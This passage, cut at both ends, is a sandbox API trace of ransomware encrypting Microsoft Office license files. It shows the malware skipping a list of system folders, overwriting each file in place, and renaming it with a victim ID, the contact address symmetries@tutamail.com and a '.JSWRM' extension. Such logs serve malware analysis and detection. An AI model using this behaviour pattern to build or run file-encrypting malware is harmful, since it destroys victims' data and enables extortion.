dwFlags=0x0, lpMem=0x23d338 | out: hHeap=0x1e0000) returned 1 [0110.607] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0110.607] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0110.607] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0110.607] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xebb3ec46, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xebb3ec46, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xebbfd7eb, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2bbf, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="VisioProCO365R_Subscription-pl.xrm-ms", cAlternateFileName="VI8C6D~1.XRM")) returned 1 [0110.608] lstrcmpiW (lpString1="VisioProCO365R_Subscription-pl.xrm-ms", lpString2=".") returned 1 [0110.608] lstrcmpiW (lpString1="VisioProCO365R_Subscription-pl.xrm-ms", lpString2="..") returned 1 [0110.608] lstrcmpiW (lpString1="VisioProCO365R_Subscription-pl.xrm-ms", lpString2="...") returned 1 [0110.608] lstrcmpiW (lpString1="VisioProCO365R_Subscription-pl.xrm-ms", lpString2="windows") returned -1 [0110.608] lstrcmpiW (lpString1="VisioProCO365R_Subscription-pl.xrm-ms", lpString2="recovery") returned 1 [0110.608] lstrcmpiW (lpString1="VisioProCO365R_Subscription-pl.xrm-ms", lpString2="perflogs") returned 1 [0110.608] lstrcmpiW (lpString1="VisioProCO365R_Subscription-pl.xrm-ms", lpString2="documents and settings") returned 1 [0110.608] lstrcmpiW (lpString1="VisioProCO365R_Subscription-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0110.608] lstrcmpiW (lpString1="VisioProCO365R_Subscription-pl.xrm-ms", lpString2="system volume information") returned 1 [0110.608] lstrcmpiW (lpString1="VisioProCO365R_Subscription-pl.xrm-ms", lpString2="msocache") returned 1 [0110.608] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c698 [0110.608] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProCO365R_Subscription-pl.xrm-ms", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0110.608] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0110.608] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProCO365R_Subscription-pl.xrm-ms", cchWideChar=37, lpMultiByteStr=0x22d260, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioProCO365R_Subscription-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 37 [0110.608] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c698 | out: hHeap=0x1e0000) returned 1 [0110.608] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22be00 [0110.608] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProCO365R_Subscription-pl.xrm-ms", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0110.608] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0110.608] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProCO365R_Subscription-pl.xrm-ms", cchWideChar=37, lpMultiByteStr=0x22cdc8, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioProCO365R_Subscription-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 37 [0110.608] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22be00 | out: hHeap=0x1e0000) returned 1 [0110.608] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0110.608] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0110.608] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0110.608] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0110.608] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0110.608] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProCO365R_Subscription-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visioproco365r_subscription-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0110.609] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11199) returned 1 [0110.609] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0110.609] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2bb0) returned 0x24c1d0 [0110.609] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2bb0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2bb0, lpOverlapped=0x0) returned 1 [0110.611] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0110.611] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2bb0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2bb0, lpOverlapped=0x0) returned 1 [0110.611] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0110.611] CloseHandle (hObject=0x45c) returned 1 [0110.614] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0110.614] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0110.614] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0110.614] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0110.614] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0110.614] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0110.614] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0110.614] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0110.614] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0110.614] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0110.614] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b2b8 [0110.614] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f848 [0110.614] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b2b8 | out: hHeap=0x1e0000) returned 1 [0110.614] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0110.614] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProCO365R_Subscription-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visioproco365r_subscription-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProCO365R_Subscription-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visioproco365r_subscription-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0110.615] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f848 | out: hHeap=0x1e0000) returned 1 [0110.615] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0110.615] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0110.615] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0110.615] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0110.615] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xebacc502, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xebacc502, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xebb8b0de, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x53a5, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="VisioProCO365R_Subscription-ppd.xrm-ms", cAlternateFileName="VISIOP~4.XRM")) returned 1 [0110.616] lstrcmpiW (lpString1="VisioProCO365R_Subscription-ppd.xrm-ms", lpString2=".") returned 1 [0110.616] lstrcmpiW (lpString1="VisioProCO365R_Subscription-ppd.xrm-ms", lpString2="..") returned 1 [0110.616] lstrcmpiW (lpString1="VisioProCO365R_Subscription-ppd.xrm-ms", lpString2="...") returned 1 [0110.616] lstrcmpiW (lpString1="VisioProCO365R_Subscription-ppd.xrm-ms", lpString2="windows") returned -1 [0110.616] lstrcmpiW (lpString1="VisioProCO365R_Subscription-ppd.xrm-ms", lpString2="recovery") returned 1 [0110.616] lstrcmpiW (lpString1="VisioProCO365R_Subscription-ppd.xrm-ms", lpString2="perflogs") returned 1 [0110.616] lstrcmpiW (lpString1="VisioProCO365R_Subscription-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0110.616] lstrcmpiW (lpString1="VisioProCO365R_Subscription-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0110.616] lstrcmpiW (lpString1="VisioProCO365R_Subscription-ppd.xrm-ms", lpString2="system volume information") returned 1 [0110.616] lstrcmpiW (lpString1="VisioProCO365R_Subscription-ppd.xrm-ms", lpString2="msocache") returned 1 [0110.616] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c698 [0110.616] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProCO365R_Subscription-ppd.xrm-ms", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0110.616] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0110.616] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProCO365R_Subscription-ppd.xrm-ms", cchWideChar=38, lpMultiByteStr=0x22cdc8, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioProCO365R_Subscription-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 38 [0110.616] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c698 | out: hHeap=0x1e0000) returned 1 [0110.616] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c698 [0110.616] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProCO365R_Subscription-ppd.xrm-ms", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0110.616] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0110.616] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProCO365R_Subscription-ppd.xrm-ms", cchWideChar=38, lpMultiByteStr=0x22d0a0, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioProCO365R_Subscription-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 38 [0110.616] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c698 | out: hHeap=0x1e0000) returned 1 [0110.616] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b768 [0110.616] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0110.616] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0110.616] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0110.616] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24ba88 [0110.616] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProCO365R_Subscription-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visioproco365r_subscription-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0110.617] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=21413) returned 1 [0110.617] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0110.617] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x53a0) returned 0x24c1d0 [0110.617] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x53a0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x53a0, lpOverlapped=0x0) returned 1 [0110.656] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0110.656] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x53a0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x53a0, lpOverlapped=0x0) returned 1 [0110.656] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0110.656] CloseHandle (hObject=0x45c) returned 1 [0110.656] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24c000 [0110.656] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0110.656] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0110.656] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0110.656] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0110.656] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0110.656] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0110.656] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0110.656] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0110.656] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0110.656] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bda8 [0110.656] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f720 [0110.656] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bda8 | out: hHeap=0x1e0000) returned 1 [0110.656] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0110.657] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProCO365R_Subscription-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visioproco365r_subscription-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProCO365R_Subscription-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visioproco365r_subscription-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0110.658] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f720 | out: hHeap=0x1e0000) returned 1 [0110.658] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c000 | out: hHeap=0x1e0000) returned 1 [0110.658] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24ba88 | out: hHeap=0x1e0000) returned 1 [0110.658] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0110.658] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0110.658] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeba33b90, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeba33b90, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xebacc502, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d7c, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="VisioProCO365R_Subscription-ul-oob.xrm-ms", cAlternateFileName="VISIOP~1.XRM")) returned 1 [0110.658] lstrcmpiW (lpString1="VisioProCO365R_Subscription-ul-oob.xrm-ms", lpString2=".") returned 1 [0110.658] lstrcmpiW (lpString1="VisioProCO365R_Subscription-ul-oob.xrm-ms", lpString2="..") returned 1 [0110.658] lstrcmpiW (lpString1="VisioProCO365R_Subscription-ul-oob.xrm-ms", lpString2="...") returned 1 [0110.658] lstrcmpiW (lpString1="VisioProCO365R_Subscription-ul-oob.xrm-ms", lpString2="windows") returned -1 [0110.658] lstrcmpiW (lpString1="VisioProCO365R_Subscription-ul-oob.xrm-ms", lpString2="recovery") returned 1 [0110.658] lstrcmpiW (lpString1="VisioProCO365R_Subscription-ul-oob.xrm-ms", lpString2="perflogs") returned 1 [0110.658] lstrcmpiW (lpString1="VisioProCO365R_Subscription-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0110.658] lstrcmpiW (lpString1="VisioProCO365R_Subscription-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0110.658] lstrcmpiW (lpString1="VisioProCO365R_Subscription-ul-oob.xrm-ms", lpString2="system volume information") returned 1 [0110.658] lstrcmpiW (lpString1="VisioProCO365R_Subscription-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0110.658] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ce8 [0110.658] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProCO365R_Subscription-ul-oob.xrm-ms", cchWideChar=41, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0110.658] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0110.658] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProCO365R_Subscription-ul-oob.xrm-ms", cchWideChar=41, lpMultiByteStr=0x22d0a0, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioProCO365R_Subscription-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 41 [0110.658] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ce8 | out: hHeap=0x1e0000) returned 1 [0110.659] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c80 [0110.659] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProCO365R_Subscription-ul-oob.xrm-ms", cchWideChar=41, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0110.659] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0110.659] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProCO365R_Subscription-ul-oob.xrm-ms", cchWideChar=41, lpMultiByteStr=0x22d260, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioProCO365R_Subscription-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 41 [0110.659] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c80 | out: hHeap=0x1e0000) returned 1 [0110.659] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bc18 [0110.659] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b768 | out: hHeap=0x1e0000) returned 1 [0110.659] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0110.659] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0110.659] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24ba88 [0110.659] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProCO365R_Subscription-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visioproco365r_subscription-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0110.659] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11644) returned 1 [0110.660] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0110.660] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d70) returned 0x24c1d0 [0110.660] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d70, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d70, lpOverlapped=0x0) returned 1 [0111.138] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.138] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d70, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d70, lpOverlapped=0x0) returned 1 [0111.138] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0111.139] CloseHandle (hObject=0x45c) returned 1 [0111.139] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b5d8 [0111.139] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0111.139] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0111.139] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0111.139] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0111.139] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0111.139] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0111.139] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0111.139] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0111.139] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0111.139] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22dff8 [0111.139] 